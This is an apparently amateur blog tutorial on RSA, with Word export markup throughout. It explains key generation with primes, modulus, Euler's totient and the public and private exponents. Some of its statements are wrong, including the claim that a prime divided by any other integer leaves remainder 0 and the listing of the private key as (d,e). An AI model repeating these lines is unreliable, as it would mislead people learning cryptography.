<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]-->
<!--StartFragment-->
</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>Picture4</b>: Asymmetric
cryptography [7]<o:p></o:p></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span style="font-size: large;">Asymmetric and Symmetric Cryptography revised </span></b></span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">Unlike Symmetric Cryptography,
Asymmetric Cryptography uses a different key for encryption than for
decryption. I.e., a user knowing the encryption key of an asymmetric algorithm
can encrypt messages, but cannot derive the decryption key and cannot decrypt
messages encrypted with that key. This difference is the most obvious
difference of Symmetric and Asymmetric Cryptography. Another difference of
Symmetric and Asymmetric Cryptography is the mathematical properties of each
type of algorithm and they way the mathematical algorithm is implemented in a
hardware or software device (further explanation of these differences are out
of the scope of this paper).</span><br />
<br />
<b><span style="font-size: large;">Why RSA is important</span></b><br />
<span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;">The RSA Cryptographic algorithm is being
exploited by a company named also RSA. The company RSA is the security division
of EMC (EMC acquired RSA for its security products in 2006). </span><span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;">RSA Laboratories is the research center of RSA,
The Security Division of EMC, and the security research group within the EMC
Innovation Network. The group was established in 1991 at RSA Data Security, the
company founded by the inventors of the RSA public-key cryptosystem. Through
its applied research program and academic connections, RSA Laboratories provides
state-of-the-art expertise in cryptography and data security for the benefit of
RSA and EMC. [10]</span></div>
</div>
<div class="MsoNormal">
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;">Represented by the equation "c = me mod
n," the RSA algorithm is widely considered the standard for encryption and
the core technology that secures the vast majority of the e-business conducted
on the Internet. The U.S. patent for the RSA algorithm (# 4,405,829,
"Cryptographic Communications System And Method") was issued to the
Massachusetts Institute of Technology (MIT) on September 20, 1983, licensed
exclusively to RSA Security and expires on September 20, 2000. [9]</span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;">For nearly two decades, more than 800 companies
spanning a range of global industries have turned to RSA Security as a trusted,
strategic partner that can provide the proven, time-tested encryption
implementations and resources designed to speed time to market. These
companies, including nearly 200 so far in 2000, rely on RSA BSAFE® security
software for its encryption implementation and value-added services for a broad
range of B2B, B2C and wireless applications. [9]</span><br />
<b><span style="font-size: large;"><br /></span></b>
<b><span style="font-size: large;">Math’s behind RSA</span></b></div>
<br />
The RSA algorithm involves the three following steps:<br />
<ol>
<li>Key generation. </li>
<li>Encryption. </li>
<li>Decryption.</li>
</ol>
</div>
<div class="MsoNormal">
<ol start="3" style="margin-top: 0cm;" type="1"><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span></ol>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<b>Note: </b>This is a simplistic approach of RSA.<br />
<div class="MsoNormal">
<br /></div>
<b><span style="font-size: large;">RSA Key generation</span></b><br />
<h1>
<span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif; font-size: small; font-weight: normal;">RSA includes a public
key and a private key. The public key can be known to everyone and is used for
encrypting messages. Messages encrypted with the public key can only be
decrypted using the private key. The keys are generated the following way:</span></h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">1.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Choose
two distinct <b>prime numbers</b> <i>p</i>
and <i>q</i>. In mathematics, a <b>prime number</b> (or a <b>prime</b>) is a
natural number that has exactly two <i>distinct</i> natural numbers 1 and
itself. That means that a prime number can only be divided by 1 and itself:
[13]<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<span lang="EN-GB"><br /></span>
<span lang="EN-GB"><b>Example 1</b>: 5/5 = 1<o:p></o:p></span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB"><b>Example 2</b>: 5/1 = 5<o:p></o:p></span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB">Very simplistically
talking, it means that the remainder of the division of a prime number with any
integer besides 1 and itself should be 0!! <o:p></o:p></span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB"><b>Example 3</b>: 5/2 = 2, 5 (2, 5
is not an integer)<o:p></o:p></span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB">The first fifteen prime
numbers are:</span></span><br />
<br />
<b>Example 4:</b> 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47<br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"></span><br />
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;"><b>Note:</b> For
security purposes, the integer’s </span><i style="font-family: Times, 'Times New Roman', serif;">p</i><span style="font-family: Times, 'Times New Roman', serif;"> and </span><i style="font-family: Times, 'Times New Roman', serif;">q</i><span style="font-family: Times, 'Times New Roman', serif;"> should be chosen
uniformly at random and should be of similar bit-length. [8]</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">2.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Compute
<b><i>n</i> = <i>pq</i></b><i> </i>(a), where <i>n</i> is used as the modulus
for both the public and private keys. For the purposes of this paper we will
not use long secure integers. (as soon as we have the values n and φ, the
values p and q will no longer be useful to us).<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<span lang="EN-GB"><br /></span>
<span lang="EN-GB"><b>Note</b>: For the algebra to
work properly, these two primes must not be equal. To make the cipher strong,
these prime numbers should be large, and they should be in the form of arbitrary
precision integers with a size of at least 1024 bits (bits are used when
cryptography is applied in real life examples).<o:p></o:p></span><br />
</span><br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">Example
3: (a) <b><i>n</i> = <i>pq </i></b>(b)<b><i> </i></b>which means that
if p = 2 and q = 3 then n = 2*3 = 6 (both 2 and 3 are prime based in Example 4).<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">Now that we have the values n and φ, the values p and q will no
longer be useful to us. However, we must ensure that nobody else will ever be
able to discover these values. Destroy them, leaving no trace behind so that
they cannot be used against us in the future. Otherwise, it will be very easy
for an attacker to reconstruct our key pair and decipher our cipher text.<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">3.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Compute
</span><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>pq</i>) = (<i>p</i> − 1)(<i>q</i> − 1) (c)
or </span><i><span lang="EL">φ</span></i><span lang="EN-GB">(n) = (<i>p</i> − 1)(<i>q</i> − 1). (</span><i><span lang="EL">φ</span></i><span lang="EN-GB"> is Euler's
totient function [11], Euler's totient function is out of the scope of this
paper). <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">4.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Choose
an integer <i>e</i> such that:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l1 level2 lfo2; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><b><span lang="EN-GB">1 < <i>e</i> < </span><i><span lang="EL">φ</span></i></b><b> (<i>pq</i>)</b><span lang="EN-GB"> <b>or </b><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l1 level2 lfo2; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><b><span lang="EN-GB">1 < <i>e</i> < </span><i><span lang="EL">φ</span></i></b><b> (<i>n</i>) or <o:p></o:p></b></div>
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l1 level2 lfo2; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><b><span lang="EN-GB">1 < <i>e</i> < <i>(p − 1)
(q − 1)</i></span></b><span lang="EN-GB"> (d)<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 36.0pt;">
<br /></div>
<div class="MsoNormal">
<span lang="EN-GB">And <i>e</i>
and </span><i><span lang="EL">φ</span></i><span lang="EN-GB"> (<i>pq</i>) have no common divisors other than 1. We randomly select a
number e (the letter e is used because we will use this value during
encryption) that is greater than 1, less than φ, and relatively prime to φ. Two
numbers are said to be relatively prime if they have no prime factors in
common. Note that e does not necessarily have to be prime. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-GB">The value
of e is used along with the value n to represent the public key used for
encryption.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l1 level2 lfo2; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><i>e</i><span lang="EN-GB"> is
released as the public key exponent<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 36.0pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">5.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Determine
<i>d</i> (using modular arithmetic) which satisfies the relation:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<span lang="EN-GB"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmyUAo5zXut7CVMCLs3UaQD4G5wYqvBc3yQ-30c48vRQQZ6rWPjwa7g0ejWKJ1sRZRAHV8C1dXl9WnABjAU9SFS87m2Ch-CIeyCrcqb6jF37b7naIJzBAmoCcRy1XfpqZ3XUdtbRgu55c/s1600/c4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmyUAo5zXut7CVMCLs3UaQD4G5wYqvBc3yQ-30c48vRQQZ6rWPjwa7g0ejWKJ1sRZRAHV8C1dXl9WnABjAU9SFS87m2Ch-CIeyCrcqb6jF37b7naIJzBAmoCcRy1XfpqZ3XUdtbRgu55c/s1600/c4.png" /></a></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<span lang="EN-GB"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<span lang="EN-GB"><br /></span></div>
<!--EndFragment--><div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
This is
often computed using the extended Euclidean algorithm [12] (Euclidean algorithm
is out of the scope of this paper).</span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l0 level1 lfo1; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><i><span lang="EN-GB">d</span></i><span lang="EN-GB"> is kept as
the private key exponent.<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<b style="font-family: Times, 'Times New Roman', serif;">Note</b><span style="font-family: Times, 'Times New Roman', serif;">: To calculate the unique value d (to be used during decryption)
that satisfies the requirement that, if d * e is divided by φ, then the
remainder of the division is 1. The mathematical notation for this (as already
described above) is d * e = 1(mod φ).</span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB"><br /></span></span>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">In mathematical jargon, we say that d is the multiplicative inverse of
e modulo φ [15]. The value of d is to be kept secret. If you know the value of
φ, the value of d can be easily obtained from e using a technique known as the
Euclidean algorithm. If you know n (which is public), but not p or q (which
have been destroyed), then the value of φ is very hard to determine. The secret
value of d together with the value n represents the private key. </span></span><span style="font-family: Times, 'Times New Roman', serif;">The public
key consists of the modulus n and the public (or encryption) exponent e. The
private key consists of the modulus n and the private (or decryption) exponent
d which must be kept secret.</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span style="font-size: large;">
RSA
Encryption<o:p></o:p></span></span></h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;">RSA
Cryptographic User A transmits his public key </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;"><b>(<i>n</i>,<i>e</i>)</b></span><span style="font-family: Times, 'Times New Roman', serif;"> to RSA
Cryptographic User B and keeps his private key secret </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;"><b>(d,<i>e</i>)</b></span><span style="font-family: Times, 'Times New Roman', serif;">. RSA Cryptographic
User B then wishes to send a secret integer </span><b style="font-family: Times, 'Times New Roman', serif;">m</b><span style="font-family: Times, 'Times New Roman', serif;"> to RSA Cryptographic User A.
He first turns </span><b style="font-family: Times, 'Times New Roman', serif;">m </b><span style="font-family: Times, 'Times New Roman', serif;">into an integer </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;">0 < <i>m</i>
< <i>n</i></span><span style="font-family: Times, 'Times New Roman', serif;"> by using an agreed-upon reversible procedure (only known
to Users A and B). He then computes the cipher text </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;"><i>c</i></span><span style="font-family: Times, 'Times New Roman', serif;">
corresponding to: [9]</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<!--EndFragment--></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7eiEOEQahD-YiVPBz34zouZJh2uR9FzSvwH4mJqJC_hyphenhyphenIvO3FFBq4tHiaCw2Zns_33u3N83jcyMkeiG4ElAbcqzVoXwxRlcwiGlk7Eb9xPQ546JoW0W57ZAq_-YoRR7FX0Uf0EA76_dY/s1600/c5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: Times, Times New Roman, serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7eiEOEQahD-YiVPBz34zouZJh2uR9FzSvwH4mJqJC_hyphenhyphenIvO3FFBq4tHiaCw2Zns_33u3N83jcyMkeiG4ElAbcqzVoXwxRlcwiGlk7Eb9xPQ546JoW0W57ZAq_-YoRR7FX0Uf0EA76_dY/s1600/c5.png" /></span></a></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>34</o:Words>
<o:Characters>196</o:Characters>
<o:Company>Lamehacker</o:Company>
<o:Lines>1</o:Lines>
<o:Paragraphs>1</o:Paragraphs>
<o:CharactersWithSpaces>229</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="0" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
